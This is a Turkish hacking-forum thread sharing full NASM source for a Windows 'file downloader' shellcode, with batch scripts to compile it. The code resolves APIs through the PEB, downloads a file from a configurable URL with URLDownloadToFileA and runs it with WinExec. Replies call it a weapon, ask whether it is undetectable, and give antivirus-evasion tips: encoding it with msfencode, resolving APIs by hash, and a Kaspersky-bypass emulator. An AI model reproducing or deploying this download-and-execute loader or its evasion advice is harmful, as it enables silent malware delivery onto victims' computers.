NASM File Downloader - Shell Code
-
;Author : Ersan YAKIT ersanyakit@yahoo.com.tr ;http://www.offensive-security.com/metasploit-unleashed/Msfencode %DEFINE DEBUGMODE section .code bits 32 global EntryPoint EY_PROTECT_START : db 0x41,0x50,0x4F,0x43,0x41,0x4C,0x59,0x50,0x53,0x45 EY_PROTECT_END : db 0x20,0x4C,0x45,0x47,0x45,0x4E,0x44,0x5A EntryPoint: CALL InitMe InitMe: POP EBP SUB EBP, InitMe XOR EAX, EAX MOV EAX, [FS:0x30] MOV EAX, [EAX+0x0C] MOV EAX, [EAX+0x14] MOV EAX, [EAX] MOV EAX, [EAX] MOV EAX, [EAX+0x10] PUSH EAX LEA EDI, [EBP + szLoadLibraryA] CALL GETPROCEDUREADDRESS LEA EDI, [EBP + kernel32dll] PUSH EDI CALL EAX LEA EDI, [EBP + szDeleteFileA] CALL GETPROCEDUREADDRESS PUSH filepath CALL EAX %IFDEF DEBUGMODE ; Load MESSAGEBOX API MOV EAX, dword [ESP] LEA EDI, [EBP + szLoadLibraryA] CALL GETPROCEDUREADDRESS LEA EDI, [EBP + user32dll] PUSH EDI CALL EAX LEA EDI, [EBP + szMessageBoxA] CALL GETPROCEDUREADDRESS ; Execute MESSAGEBOX PUSH 0 PUSH mbtitle PUSH mbtext PUSH 0 CALL EAX %ENDIF ; Load URLDownloadToFileA API MOV EAX, dword [ESP] LEA EDI, [EBP + szLoadLibraryA] CALL GETPROCEDUREADDRESS LEA EDI, [EBP + szurlmondll] PUSH EDI CALL EAX LEA EDI, [EBP + szURLDownloadToFileA] CALL GETPROCEDUREADDRESS ; Call URLDownloadToFileA PUSH 0 PUSH 0 PUSH szDownloadTo PUSH szURL PUSH 0 CALL EAX ; Load WinExec MOV EAX, dword [ESP] LEA EDI, [EBP + szLoadLibraryA] CALL GETPROCEDUREADDRESS LEA EDI, [EBP + kernel32dll] PUSH EDI CALL EAX LEA EDI, [EBP + szWinExec] CALL GETPROCEDUREADDRESS ; Call WinExec PUSH 0 PUSH szDownloadTo CALL EAX ; Load ExitProcess POP EAX LEA EDI, [EBP + szExitProcess] CALL GETPROCEDUREADDRESS ; Call ExitProcess PUSH 0 CALL EAX GETPROCEDUREADDRESS: PUSH ECX PUSH EDX PUSH EBX PUSH ESI MOV EBX, dword [EAX + 03Ch] ; ADD EBX, EAX; CMP word [EBX], 04550h JNZ API_CMP_FIND_ERROR MOV EBX, [EBX + 078h] ADD EBX, EAX MOV ECX, [EBX + 018h] DEC ECX MOV EDX, [EBX + 020h] ADD EDX, EAX API_CMP_FIND_LOOP: MOV ESI, [EDX + ECX * 4] ADD ESI, EAX PUSH EDI PUSH EAX PUSH EBX API_CMP_LOOP: MOV AL, byte [ESI] MOV BL, byte [EDI] SUB AL, BL JNE API_CMP_DIFFRENT CMP BL, 0 JZ API_CMP_EQUAL INC ESI INC EDI JMP API_CMP_LOOP API_CMP_DIFFRENT: POP EBX POP EAX POP EDI LOOP API_CMP_FIND_LOOP JMP API_CMP_FIND_ERROR API_CMP_EQUAL: POP EBX POP EAX POP EDI MOV EDX, [EBX + 024h] ADD EDX, EAX; MOV CX, [EDX + ECX * 2] MOV EDX, [EBX + 01Ch] ADD EDX, EAX MOV EBX, [EDX + ECX * 4] ADD EAX, EBX POP ESI POP EBX POP EDX POP ECX RET API_CMP_FIND_ERROR: XOR EAX, EAX POP ESI POP EBX POP EDX POP ECX RET section .data user32dll db 0x75,0x73,0x65,0x72,0x33,0x32,0x2E,0x64,0x6C,0x6C, 0;"user32.dll" kernel32dll db 0x6B,0x65,0x72,0x6E,0x65,0x6C,0x33,0x32,0x2E,0x64,0x6C,0x6C, 0;"kernel32.dll" szurlmondll db 0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,0x64,0x6C,0x6C, 0;"urlmon.dll" szLoadLibraryA db 0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,0;"LoadLibraryA" szExitProcess db 0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0;"ExitProcess" szMessageBoxA db 0x4D,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6F,0x78,0x41,0;"MessageBoxA" szDeleteFileA db 0x44,0x65,0x6C,0x65,0x74,0x65,0x46,0x69,0x6C,0x65,0x41,0;"DeleteFileA" szSleep db 0x53,0x6C,0x65,0x65,0x70,0;"Sleep" szURLDownloadToFileA db 0x55,0x52,0x4C,0x44,0x6F,0x77,0x6E,0x6C,0x6F,0x61,0x64,0x54,0x6F,0x46,0x69,0x6C,0x65,0x41,0;"URLDownloadToFileA" szWinExec db 0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0;"WinExec" filepath db 0x66,0x75,0x63,0x6B,0x79,0x6F,0x75,0x2E,0x74,0x78,0x74,0 mbtitle db 0x4F,0x68,0x21,0x20,0x53,0x69,0x6D,0x6F,0x6E,0x2C,0 mbtext db 0x49,0x20,0x68,0x61,0x76,0x65,0x20,0x62,0x65,0x65,0x6E,0x20,0x74,0x68,0x69,0x6E,0x6B,0x20,0x61,0x62,0x6F,0x75,0x74,0x20,0x79,0x6F,0x75,0x20,0x73,0x6F,0x20,0x6D,0x75,0x63,0x68,0x21,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x4F,0x4B,0x41,0x59,0x3F,0 szURL db "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", 0 szDownloadTo db "PuttyDownload.exe", 0
-
EXE Output İçin Batch Scripti
wh0 tarafından 10/Oca/15 14:42 tarihinde düzenlenmiştir
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.exe DEL %ProjectName%.exe
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
REM Compiling...
nasm -fobj -DEXECUTABLE %ProjectName%.asm -o %ProjectName%.obj
REM Linking...
alink -c -oPE -subsys gui %ProjectName%.obj -entry EntryPoint
REM Cleaning Up...
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
PAUSE
Shellcode Output İçin Batch Scripti
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.bin DEL %ProjectName%.bin
REM Compiling...
nasm -fbin %ProjectName%.asm -o %ProjectName%.bin
PAUSE -
bide ufak bi kullanımını tam olarak ne işe yaradıgını yazsan varya süper olurdu
-
176
szURL db "http:
//the.earth.li/~sgtatham/putty/latest/x86/putty.exe", 0
177
szDownloadTo db "PuttyDownload
.
exe",
0
alanlarini kendinize gore editleyin. ve kodu PROJEADI.asm olarak kayit edin.
Derlemek için sisteminizde NASM kurulu olmasi gerekmekte.. ihtiyacınız exe ise aşağıdaki exe olusturmaya yarayan bat kodunu, shellcode ise aşağıdaki shellcode olusturmaya ait bat kodunu alip PROJEADI.asm dosyasının aynı dizinine derle.bat yazip derleyebilirsiniz.
Herhangi bir adresden dosya indirip calistirmaya yarar output boyutu yaklasik 2kb gibi bişeydir.
EXE Output İçin Batch Scripti
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.exe DEL %ProjectName%.exe
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
REM Compiling...
nasm -fobj -DEXECUTABLE %ProjectName%.asm -o %ProjectName%.obj
REM Linking...
alink -c -oPE -subsys gui %ProjectName%.obj -entry EntryPoint
REM Cleaning Up...
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
PAUSE
Shellcode Output İçin Batch Scripti
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.bin DEL %ProjectName%.bin
REM Compiling...
nasm -fbin %ProjectName%.asm -o %ProjectName%.bin
PAUSE -
fud mu ersan ? downloader kodu eli .. Otomatik exe indirip çalıştırıyor. Toplu İmha Silahı : )
-
aLman bunu yazdı
fud mu ersan ? downloader kodu eli .. Otomatik exe indirip çalıştırıyor. Toplu İmha Silahı : )
urlmon dll sindeki
URLDownloadToFileA call edilsin
e
d
ilmesin, apisi tum antivirusler tarafindan istenmeyen yazilim olarak algilanmaktadir. ufak tefek modifikasyonlar ile taninmaz hale getirebilirsiniz. ben antiviruslerde test etmedim acikcasi. ama shellcode output alip herhangi bir shellcode encoder ile shellcodeyi encode edebilirsiniz.fwb++ degil yani.SHELLCODE NASIL ENCODE Edilir Bilmeyenler için;
http:
//www.offensive-security.com/metasploit-unleashed/Msfencode
-
shellcode to executable :
http://www.tahribat.com/Forum-Delphi-Shellcode-2-Executable-204320/
asm ile olusturdugunuz shellcode a ait bin dosyasini yukaridaki delphi uygulama ile kolaylikla calistirilabilir PE formatina donusturebilirsiniz.
ek bilgi,
yukaridaki asm kodu executable olarak calisir ancak, shellcode donusturulurse calismayacaktir. sebebini kotu niyetli sahislar, derleyip kullanmasin diye soylemedim. az bi miktar asm bilen herkes asagida verdigim kodu gerekli yerler ile replace edebilir ;
LEA EDI,[EBP+BLAHBLAHBLAH]
PUSH EDIkolay gelsin.
-
2 KB çok iyi la =)
her ne kadar o URLDownloadToFile apisi antivirusleri en çok kıllandıran şey olsa da icraat güzelmiş =)
Dll in içindeki fonksionları döndürüp fonksiyon adının hashi ile karşılaştırıp seçip kullanırsan ses etmeyebilir antivirus.
-
HolyOne bunu yazdı
2 KB çok iyi la =)
her ne kadar o URLDownloadToFile apisi antivirusleri en çok kıllandıran şey olsa da icraat güzelmiş =)
Dll in içindeki fonksionları döndürüp fonksiyon adının hashi ile karşılaştırıp seçip kullanırsan ses etmeyebilir antivirus.
teskurler abü;
http://tahribat.com/Forum-Gelistiriciler-Icin-C-To-Nasm-Donusturme-Ornegi-204364/
http://tahribat.com/Forum-Nasm-File-Downloader-Shell-Code-203995/
http://tahribat.com/Forum-Delphi-Shellcode-2-Executable-204320/
bu 3 konu birbiri ile baglantilidir ;)
C to NASM Donusturme Konusundaki Kod Eski Kaspersky Bypass icin gerekli Emulator idi.
Su siralar calisiyormu bilmiyorum... Bos vaktimde birlestirip test edeyim;)